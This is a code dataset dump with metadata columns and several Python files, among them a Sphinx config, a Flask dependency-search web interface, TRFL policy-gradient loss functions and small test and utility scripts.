repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
tri2sing/IntroPython | Loops.py | 1 | 1308 |
from sys import float_info as sfi
def square_root (n):
'''Square root calculated using Netwton's method
'''
x = n/2.0
while True:
y = (x + n/x)/2
# As equality in floating numbers can be elusive,
# we check if the numbers are close to each other.
if abs(y-x) < sfi.epsilon:
break
x = y
return x
def factorial_new(n):
'''Factorial using for loop
'''
result = 1
if n < 0: return None
if n == 0: return 1
for i in range(1, n+1):
result = result * i
return result
def skipper01(end, start=0, step=1):
for i in range(start, end, step):
print(i, end=' ')
def skipper02(end, start=0, step=1):
i = start
while(i < end):
print(i, end=' ')
i = i + step
if __name__ == "__main__":
print("The square root of 4 = " + str(square_root(4)))
print("The square root of 9 = " + str(square_root(9)))
print("The square root of 15 = %.4f " % square_root(14))
print("The factorial of 4 = " + str(factorial_new(4)))
print("The factorial of 7 = " + str(factorial_new(7)))
print("The factorial of 10 = %d " % factorial_new(10))
skipper01(10, 5, 2)
print('\n')
skipper02(13, 3, 3)
print('\n')
skipper01(8)
print('\n')
skipper02(7)
| apache-2.0 | 8,439,470,421,023,596,000 | 24.153846 | 60 | 0.547401 | false |
ltowarek/budget-supervisor | third_party/saltedge/test/test_reconnect_session_request_body_data.py | 1 | 1050 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.reconnect_session_request_body_data import ReconnectSessionRequestBodyData # noqa: E501
from swagger_client.rest import ApiException
class TestReconnectSessionRequestBodyData(unittest.TestCase):
"""ReconnectSessionRequestBodyData unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testReconnectSessionRequestBodyData(self):
"""Test ReconnectSessionRequestBodyData"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.reconnect_session_request_body_data.ReconnectSessionRequestBodyData() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| mit | -8,373,832,002,242,567,000 | 25.923077 | 123 | 0.724762 | false |
smartmob-project/procfile | docs/conf.py | 1 | 9607 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# procfile documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 23 19:51:57 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
try:
from sphinxcontrib import spelling
except ImportError:
spelling = None
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
]
# Spelling extension is not available on ReadTheDocs. It isn't needed anyways
# since this will be validated by continuous integration and only successful
# builds will be published on RTFD.
if spelling:
extensions.append('sphinxcontrib.spelling')
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'procfile'
copyright = '2015, procfile contributors'
author = 'procfile contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'procfiledoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'procfile.tex', 'procfile Documentation',
'procfile contributors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'procfile', 'procfile Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'procfile', 'procfile Documentation',
author, 'procfile', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 2,425,044,857,591,886,300 | 31.130435 | 79 | 0.709899 | false |
DavidBarishev/DDtankFarmingBot | Ddtank_farm_bot/Framework/CommonItems.py | 1 | 1198 | """Has presets for common items
Attributes:
random_card (dict): Random card item
exp_1 (dict): Exp pill lv 1
exp_2 (dict): Exp pill lv 2
exp_3 (dict): Exp pill lv 3
exp_4 (dict): Exp pill lv 4
"""
import Items
import Inventory
from Util import image_path_main
exp_1 = {
"item_img": image_path_main('EXP_1'),
"function": Items.ItemFunctions.Open_Empty,
"index_of_function": 1,
"section": Inventory.InventorySections.Items
}
exp_2 = {
"item_img": image_path_main('EXP_2'),
"function": Items.ItemFunctions.Open_Empty,
"index_of_function": 1,
"section": Inventory.InventorySections.Items
}
exp_3 = {
"item_img": image_path_main('EXP_3'),
"function": Items.ItemFunctions.Open_Empty,
"index_of_function": 1,
"section": Inventory.InventorySections.Items
}
exp_4 = {
"item_img": image_path_main('EXP_4'),
"function": Items.ItemFunctions.Open_Empty,
"index_of_function": 1,
"section": Inventory.InventorySections.Items
}
random_card = {
"item_img": image_path_main('Card'),
"function": Items.ItemFunctions.Batch_Empty_Preferred,
"index_of_function": 1,
"section": Inventory.InventorySections.Items
}
| gpl-3.0 | -3,529,443,610,802,917,400 | 23.958333 | 58 | 0.657763 | false |
fginter/dep_search_serve | serve_depsearch.py | 1 | 6001 | #!/usr/bin/env python3
# This code can run in both Python 2.7+ and 3.3+
import cgi
from flask import Flask, Markup
import flask
import json
import requests
import six
import six.moves.urllib as urllib # use six for python 2.x compatibility
import traceback
DEBUGMODE=False
try:
from config_local import * #use to override the constants above if you like
except ImportError:
pass #no config_local
app = Flask("dep_search_webgui")
def yield_trees(src):
current_tree=[]
current_comment=[]
current_context=u""
for line in src:
if line.startswith(u"# visual-style"):
current_tree.append(line)
elif line.startswith(u"# URL:"):
current_comment.append(Markup(u'<a href="{link}">{link}</a>'.format(link=line.split(u":",1)[1].strip())))
elif line.startswith(u"# context-hit"):
current_context+=(u' <b>{sent}</b>'.format(sent=flask.escape(line.split(u":",1)[1].strip())))
elif line.startswith(u"# context"):
current_context+=(u' {sent}'.format(sent=flask.escape(line.split(u":",1)[1].strip())))
elif line.startswith(u"# hittoken"):
current_tree.append(line)
elif not line.startswith(u"#"):
current_tree.append(line)
if line==u"":
current_comment.append(Markup(current_context))
yield u"\n".join(current_tree), current_comment
current_comment=[]
current_tree=[]
current_context=u""
class Query:
@classmethod
def from_formdata(cls,fdata):
query=fdata[u'query'].strip()
hits_per_page=int(fdata[u'hits_per_page'])
treeset=fdata[u'treeset'].strip()
if fdata.get(u'case'):
case_sensitive=True
else:
case_sensitive=False
return(cls(treeset,query,case_sensitive,hits_per_page))
@classmethod
def from_get_request(cls,args):
query=args[u"search"]
treeset=args[u"db"]
case_sensitive=True
hits_per_page=10
return(cls(treeset,query,case_sensitive,hits_per_page))
def __init__(self,treeset,query,case_sensitive,hits_per_page):
self.treeset,self.query,self.case_sensitive,self.hits_per_page=treeset,query,case_sensitive,hits_per_page
def query_link(self,url=u"",treeset=None):
if treeset is None:
treeset=self.treeset
if six.PY2:
return url+u"query?search={query}&db={treeset}&case_sensitive={case_sensitive}&hits_per_page={hits_per_page}".format(query=unicode(urllib.parse.quote(self.query.encode("utf-8")),"utf-8"),treeset=treeset,case_sensitive=self.case_sensitive,hits_per_page=self.hits_per_page)
else:
return url+u"query?search={query}&db={treeset}&case_sensitive={case_sensitive}&hits_per_page={hits_per_page}".format(query=urllib.parse.quote(self.query),treeset=treeset,case_sensitive=self.case_sensitive,hits_per_page=self.hits_per_page)
def download_link(self,url=""):
if six.PY2:
return DEP_SEARCH_WEBAPI+u"?search={query}&db={treeset}&case={case_sensitive}&retmax=5000&dl".format(query=unicode(urllib.parse.quote(self.query.encode("utf-8")),"utf-8"),treeset=self.treeset,case_sensitive=self.case_sensitive)
else:
return DEP_SEARCH_WEBAPI+u"?search={query}&db={treeset}&case={case_sensitive}&retmax=5000&dl".format(query=urllib.parse.quote(self.query),treeset=self.treeset,case_sensitive=self.case_sensitive)
@app.route(u"/")
def index():
r=requests.get(DEP_SEARCH_WEBAPI+u"/metadata") #Ask about the available corpora
metadata=json.loads(r.text)
return flask.render_template(u"index_template.html",corpus_groups=metadata[u"corpus_groups"])
#This is what JS+AJAX call
@app.route(u'/query',methods=[u"POST"])
def query_post():
try:
sources=[]
q=Query.from_formdata(flask.request.form)
r=requests.get(DEP_SEARCH_WEBAPI,params={u"db":q.treeset, u"case":q.case_sensitive, u"context":3, u"search":q.query, u"retmax":q.hits_per_page})
if r.text.startswith(u"# Error in query"):
ret = flask.render_template(u"query_error.html", err=r.text)
elif not r.text.strip():
ret = flask.render_template(u"empty_result.html")
else:
lines=r.text.splitlines()
if lines[0].startswith("# SourceStats : "):
sources=json.loads(lines[0].split(" : ",1)[1])
ret=flask.render_template(u"result_tbl.html",trees=yield_trees(lines[1:]))
else:
ret=flask.render_template(u"result_tbl.html",trees=yield_trees(lines))
links=['<a href="{link}">{src}</a>'.format(link=q.query_link(treeset=src),src=src) for src in sources]
return json.dumps({u'ret':ret,u'source_links':u' '.join(links),u'query_link':q.query_link(),u'download_link':q.download_link()});
except:
traceback.print_exc()
#This is what GET calls
#We return the index and prefill a script call to launch the form for us
@app.route(u'/query',methods=[u"GET"])
def query_get():
r=requests.get(DEP_SEARCH_WEBAPI+u"/metadata") #Ask about the available corpora
metadata=json.loads(r.text)
if u"db" not in flask.request.args or u"search" not in flask.request.args:
return flask.render_template(u"get_help.html",corpus_groups=metadata[u"corpus_groups"])
q=Query.from_get_request(flask.request.args)
run_request=Markup(u'dsearch_simulate_form("{treeset}",he.decode("{query}"),"{case_sensitive}","{max_hits}");'.format(treeset=cgi.escape(q.treeset),query=q.query.replace(u'"',u'\\"'),case_sensitive=cgi.escape(str(q.case_sensitive)),max_hits=cgi.escape(str(q.hits_per_page))))
return flask.render_template(u"index_template.html",corpus_groups=metadata[u"corpus_groups"],run_request=run_request)
if __name__ == u'__main__':
app.run(debug=DEBUGMODE)
r=requests.get(DEP_SEARCH_WEBAPI+u"/metadata") #Ask about the available corpora
metadata=json.loads(r.text)
| apache-2.0 | 5,265,060,962,744,545,000 | 43.783582 | 283 | 0.653724 | false |
CloudBoltSoftware/cloudbolt-forge | rules/find_and_delete_old_sync_jobs/find_old_sync_jobs.py | 1 | 1052 | """
IF Rule Action
Locate sync jobs older than the provided amount of days
"""
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import sys
import datetime
import json
sys.path.append('/opt/cloudbolt')
from common.methods import set_progress
from utilities.logger import ThreadLogger
logger = ThreadLogger(__name__)
from jobs.models import Job
days = '{{ threshold_days_before_delete }}'
def check(job, logger, days=days, *args, **kwargs):
delete_date = datetime.datetime.now() - datetime.timedelta(days=int(days))
sync_jobs_total = Job.objects.filter(type="syncvms").count()
set_progress("Total sync jobs {}".format(sync_jobs_total))
sync_jobs = Job.objects.filter(type="syncvms", start_date__lt=delete_date).exclude(status="RUNNING")
set_progress("Found {} jobs to delete".format(sync_jobs.count()))
sync_jobs_ids = list(sync_jobs.values_list('id', flat=True))
return ("SUCCESS", "", "", {'sync_jobs': sync_jobs_ids})
if __name__ == '__main__':
days_arg = sys.argv[1]
check(days=days_arg, job=None)
| apache-2.0 | -2,208,363,094,936,291,800 | 32.935484 | 104 | 0.695817 | false |
deepmind/trfl | trfl/policy_gradient_ops.py | 1 | 16797 | # Copyright 2018 The trfl Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow ops for continuous-action Policy Gradient algorithms."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
from six.moves import zip
import tensorflow.compat.v1 as tf
import tree as nest
from trfl import base_ops
from trfl import value_ops
PolicyEntropyExtra = collections.namedtuple("policy_entropy_extra", ["entropy"])
SequenceA2CExtra = collections.namedtuple(
"sequence_a2c_extra", ["entropy", "entropy_loss", "baseline_loss",
"policy_gradient_loss", "advantages",
"discounted_returns"])
def policy_gradient(policies, actions, action_values, policy_vars=None,
name="policy_gradient"):
"""Computes policy gradient losses for a batch of trajectories.
See `policy_gradient_loss` for more information on expected inputs and usage.
Args:
policies: A distribution over a batch supporting a `log_prob` method, e.g.
an instance of `tfp.distributions.Distribution`. For example, for
a diagonal gaussian policy:
`policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)`
actions: An action batch Tensor used as the argument for `log_prob`. Has
shape equal to the batch shape of the policies concatenated with the
event shape of the policies (which may be scalar, in which case
concatenation leaves shape just equal to batch shape).
action_values: A Tensor containing estimates of the values of the `actions`.
Has shape equal to the batch shape of the policies.
policy_vars: An optional iterable of Tensors used by `policies`. If provided
is used in scope checks. For the multivariate normal example above this
would be `[mus, sigmas]`.
name: Customises the name_scope for this op.
Returns:
loss: Tensor with same shape as `actions` containing the total loss for each
element in the batch. Differentiable w.r.t the variables in `policies`
only.
"""
policy_vars = list(policy_vars) if policy_vars else list()
with tf.name_scope(values=policy_vars + [actions, action_values], name=name):
actions = tf.stop_gradient(actions)
action_values = tf.stop_gradient(action_values)
log_prob_actions = policies.log_prob(actions)
# Prevent accidental broadcasting if possible at construction time.
action_values.get_shape().assert_is_compatible_with(
log_prob_actions.get_shape())
return -tf.multiply(log_prob_actions, action_values)
def policy_gradient_loss(policies, actions, action_values, policy_vars=None,
name="policy_gradient_loss"):
"""Computes policy gradient losses for a batch of trajectories.
This wraps `policy_gradient` to accept a possibly nested array of `policies`
and `actions` in order to allow for multiple action distribution types or
independent multivariate distributions if not directly available. It also sums
up losses along the time dimension, and is more restrictive about shapes,
assuming a [T, B] layout for the `batch_shape` of the policies and a
concatenate(`[T, B]`, `event_shape` of the policies) shape for the actions.
Args:
policies: A (possibly nested structure of) distribution(s) supporting
`batch_shape` and `event_shape` properties along with a `log_prob`
method (e.g. an instance of `tfp.distributions.Distribution`),
with `batch_shape` equal to `[T, B]`.
actions: A (possibly nested structure of) N-D Tensor(s) with shape
`[T, B, ...]` where the final dimensions are the `event_shape` of the
corresponding distribution in the nested structure (the shape can be
just `[T, B]` if the `event_shape` is scalar).
action_values: Tensor of shape `[T, B]` containing an estimate of the value
of the selected `actions`.
policy_vars: An optional (possibly nested structure of) iterable(s) of
Tensors used by `policies`. If provided is used in scope checks.
name: Customises the name_scope for this op.
Returns:
loss: Tensor of shape `[B]` containing the total loss for each sequence
in the batch. Differentiable w.r.t `policy_logits` only.
"""
actions = nest.flatten(actions)
if policy_vars:
policy_vars = nest.flatten_up_to(policies, policy_vars)
else:
policy_vars = [list()] * len(actions)
policies = nest.flatten(policies)
# Check happens after flatten so that we can be more flexible on nest
# structures. This is equivalent to asserting that `len(policies) ==
# len(actions)`, which is sufficient for what we're doing here.
nest.assert_same_structure(policies, actions)
for policies_, actions_ in zip(policies, actions):
policies_.batch_shape.assert_has_rank(2)
actions_.get_shape().assert_is_compatible_with(
policies_.batch_shape.concatenate(policies_.event_shape))
scoped_values = policy_vars + actions + [action_values]
with tf.name_scope(name, values=scoped_values):
# Loss for the policy gradient. Doesn't push additional gradients through
# the action_values.
policy_gradient_loss_sequence = tf.add_n([
policy_gradient(policies_, actions_, action_values, pvars)
for policies_, actions_, pvars in zip(policies, actions, policy_vars)])
return tf.reduce_sum(
policy_gradient_loss_sequence, axis=[0],
name="policy_gradient_loss")
def policy_entropy_loss(policies,
policy_vars=None,
scale_op=None,
name="policy_entropy_loss"):
"""Calculates entropy 'loss' for policies represented by a distributions.
Given a (possible nested structure of) batch(es) of policies, this
calculates the total entropy and corrects the sign so that minimizing the
resulting loss op is equivalent to increasing entropy in the batch.
This function accepts a nested structure of `policies` in order to allow for
multiple distribution types or for multiple action dimensions in the case
where there is no corresponding mutivariate form for available for a given
univariate distribution. In this case, the loss is `sum_i(H(p_i, p_i))`
where `p_i` are members of the `policies` nest. It can be shown that this is
equivalent to calculating the entropy loss on the Cartesian product space
over all the action dimensions, if the sampled actions are independent.
The entropy loss is optionally scaled by some function of the policies.
E.g. for Categorical distributions there exists such a scaling which maps
the entropy loss into the range `[-1, 0]` in order to make it invariant to
the size of the action space - specifically one can divide the loss by
`sum_i(log(A_i))` where `A_i` is the number of categories in the i'th
Categorical distribution in the `policies` nest).
Args:
policies: A (possibly nested structure of) batch distribution(s)
supporting an `entropy` method that returns an N-D Tensor with shape
equal to the `batch_shape` of the distribution, e.g. an instance of
`tfp.distributions.Distribution`.
policy_vars: An optional (possibly nested structure of) iterable(s) of
Tensors used by `policies`. If provided is used in scope checks.
scale_op: An optional op that takes `policies` as its only argument and
returns a scalar Tensor that is used to scale the entropy loss.
E.g. for Diag(sigma) Gaussian policies dividing by the number of
dimensions makes entropy loss invariant to the action space dimension.
name: Optional, name of this op.
Returns:
A namedtuple with fields:
* `loss`: a tensor containing the batch of losses, shape `[B1, B2, ...]`.
* `extra`: a namedtuple with fields:
* `entropy`: entropy of the policy, shape `[B1, B2, ...]`.
where [B1, B2, ... ] == policy.batch_shape
"""
flat_policy_vars = nest.flatten(policy_vars) if policy_vars else list()
with tf.name_scope(name, values=flat_policy_vars):
# We want a value that we can minimize along with other losses, and where
# minimizing means driving the policy towards a uniform distribution over
# the actions. We thus scale it by negative one so that it can be simply
# added to other losses.
scale = tf.constant(-1.0, dtype=tf.float32)
if scale_op:
scale *= scale_op(policies)
policies = nest.flatten(policies)
entropy = tf.add_n(
[policy.entropy() for policy in policies], name="entropy")
loss = tf.multiply(scale, entropy, name="entropy_loss")
return base_ops.LossOutput(loss, PolicyEntropyExtra(entropy))
def sequence_a2c_loss(policies,
baseline_values,
actions,
rewards,
pcontinues,
bootstrap_value,
policy_vars=None,
lambda_=1,
entropy_cost=None,
baseline_cost=1,
entropy_scale_op=None,
name="SequenceA2CLoss"):
"""Constructs a TensorFlow graph computing the A2C/GAE loss for sequences.
This loss jointly learns the policy and the baseline. Therefore, gradients
for this loss flow through each tensor in `policies` and through each tensor
in `baseline_values`, but no other input tensors. The policy is learnt with
the advantage actor-critic loss, plus an optional entropy term. The baseline
is regressed towards the n-step bootstrapped returns given by the
reward/pcontinue sequence. The `baseline_cost` parameter scales the
gradients w.r.t the baseline relative to the policy gradient, i.e.
d(loss) / d(baseline) = baseline_cost * (n_step_return - baseline)`.
This function is designed for batches of sequences of data. Tensors are
assumed to be time major (i.e. the outermost dimension is time, the second
outermost dimension is the batch dimension). We denote the sequence length in
the shapes of the arguments with the variable `T`, the batch size with the
variable `B`, neither of which needs to be known at construction time. Index
`0` of the time dimension is assumed to be the start of the sequence.
`rewards` and `pcontinues` are the sequences of data taken directly from the
environment, possibly modulated by a discount. `baseline_values` are the
sequences of (typically learnt) estimates of the values of the states
visited along a batch of trajectories as observed by the agent given the
sequences of one or more actions sampled from `policies`.
The sequences in the tensors should be aligned such that an agent in a state
with value `V` that takes an action `a` transitions into another state
with value `V'`, receiving reward `r` and pcontinue `p`. Then `V`, `a`, `r`
and `p` are all at the same index `i` in the corresponding tensors. `V'` is
at index `i+1`, or in the `bootstrap_value` tensor if `i == T`.
For n-dimensional action vectors, a multivariate distribution must be used
for `policies`. In case there is no multivariate version for the desired
univariate distribution, or in case the `actions` object is a nested
structure (e.g. for multiple action types), this function also accepts a
nested structure of `policies`. In this case, the loss is given by
`sum_i(loss(p_i, a_i))` where `p_i` are members of the `policies` nest, and
`a_i` are members of the `actions` nest. We assume that a single baseline is
used across all action dimensions for each timestep.
Args:
policies: A (possibly nested structure of) distribution(s) supporting
`batch_shape` and `event_shape` properties & `log_prob` and `entropy`
methods (e.g. an instance of `tfp.distributions.Distribution`),
with `batch_shape` equal to `[T, B]`. E.g. for a (non-nested) diagonal
multivariate gaussian with dimension `A` this would be:
`policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)`
where `mus` and `sigmas` have shape `[T, B, A]`.
baseline_values: 2-D Tensor containing an estimate of the state value with
shape `[T, B]`.
actions: A (possibly nested structure of) N-D Tensor(s) with shape
`[T, B, ...]` where the final dimensions are the `event_shape` of the
corresponding distribution in the nested structure (the shape can be
just `[T, B]` if the `event_shape` is scalar).
rewards: 2-D Tensor with shape `[T, B]`.
pcontinues: 2-D Tensor with shape `[T, B]`.
bootstrap_value: 1-D Tensor with shape `[B]`.
policy_vars: An optional (possibly nested structure of) iterables of
Tensors used by `policies`. If provided is used in scope checks. For
the multivariate normal example above this would be `[mus, sigmas]`.
lambda_: an optional scalar or 2-D Tensor with shape `[T, B]` for
Generalised Advantage Estimation as per
https://arxiv.org/abs/1506.02438.
entropy_cost: optional scalar cost that pushes the policy to have high
entropy, larger values cause higher entropies.
baseline_cost: scalar cost that scales the derivatives of the baseline
relative to the policy gradient.
entropy_scale_op: An optional op that takes `policies` as its only
argument and returns a scalar Tensor that is used to scale the entropy
loss. E.g. for Diag(sigma) Gaussian policies dividing by the number of
dimensions makes entropy loss invariant to the action space dimension.
See `policy_entropy_loss` for more info.
name: Customises the name_scope for this op.
Returns:
A namedtuple with fields:
* `loss`: a tensor containing the total loss, shape `[B]`.
* `extra`: a namedtuple with fields:
* `entropy`: total loss per sequence, shape `[B]`.
* `entropy_loss`: scaled entropy loss per sequence, shape `[B]`.
* `baseline_loss`: scaled baseline loss per sequence, shape `[B]`.
* `policy_gradient_loss`: policy gradient loss per sequence,
shape `[B]`.
* `advantages`: advantange estimates per timestep, shape `[T, B]`.
* `discounted_returns`: discounted returns per timestep,
shape `[T, B]`.
"""
flat_policy_vars = nest.flatten(policy_vars) if policy_vars else list()
scoped_values = (flat_policy_vars + nest.flatten(actions) +
[baseline_values, rewards, pcontinues, bootstrap_value])
with tf.name_scope(name, values=scoped_values):
# Loss for the baseline, summed over the time dimension.
baseline_loss_td, td_lambda = value_ops.td_lambda(
baseline_values, rewards, pcontinues, bootstrap_value, lambda_)
# The TD error provides an estimate of the advantages of the actions.
advantages = td_lambda.temporal_differences
baseline_loss = tf.multiply(
tf.convert_to_tensor(baseline_cost, dtype=tf.float32),
baseline_loss_td,
name="baseline_loss")
# Loss for the policy. Doesn't push additional gradients through
# the advantages.
pg_loss = policy_gradient_loss(
policies, actions, advantages, policy_vars,
name="policy_gradient_loss")
total_loss = tf.add(pg_loss, baseline_loss, name="total_loss")
if entropy_cost is not None:
loss, extra = policy_entropy_loss(policies, policy_vars, entropy_scale_op)
entropy = tf.reduce_sum(extra.entropy, axis=0, name="entropy") # [B].
entropy_loss = tf.multiply(
tf.convert_to_tensor(entropy_cost, dtype=tf.float32),
tf.reduce_sum(loss, axis=0),
name="scaled_entropy_loss") # [B].
total_loss = tf.add(total_loss, entropy_loss,
name="total_loss_with_entropy")
else:
entropy = None
entropy_loss = None
extra = SequenceA2CExtra(
entropy=entropy,
entropy_loss=entropy_loss,
baseline_loss=baseline_loss,
policy_gradient_loss=pg_loss,
advantages=advantages,
discounted_returns=td_lambda.discounted_returns)
return base_ops.LossOutput(total_loss, extra)
| apache-2.0 | -7,097,839,571,736,575,000 | 48.258065 | 80 | 0.688397 | false |
thomaserlang/storitch | tests/upload.py | 1 | 2441 | import requests, logging, json
from storitch import config, config_load, logger
def upload_multipart():
r = requests.post(
'http://127.0.0.1:{}/store'.format(config['port']),
files={'file': open('test1.txt', 'rb')}
)
logging.debug(r.text)
logging.debug(r.status_code)
r.raise_for_status()
assert r.status_code == 201
d = r.json()
assert d[0]['hash'] == 'f29bc64a9d3732b4b9035125fdb3285f5b6455778edca72414671e0ca3b2e0de'
assert d[0]['type'] == 'file'
def upload_stream():
session = ''
with open('test1.txt', 'rb') as f:
while True:
d = f.read(5)
r = requests.put(
'http://127.0.0.1:{}/store/session'.format(config['port']),
data=d,
headers={
'Content-Type': 'application/octet-stream',
'storitch-json': json.dumps({
'session': session,
'filename': 'testæøå.txt',
'finished': False if d else True
})
},
)
logging.debug(r.text)
logging.debug(r.status_code)
r.raise_for_status()
j = r.json()
logging.debug(j)
if 'session' in j:
session = j['session']
if not d:
break
logging.debug(j)
assert j['hash'] == 'f29bc64a9d3732b4b9035125fdb3285f5b6455778edca72414671e0ca3b2e0de'
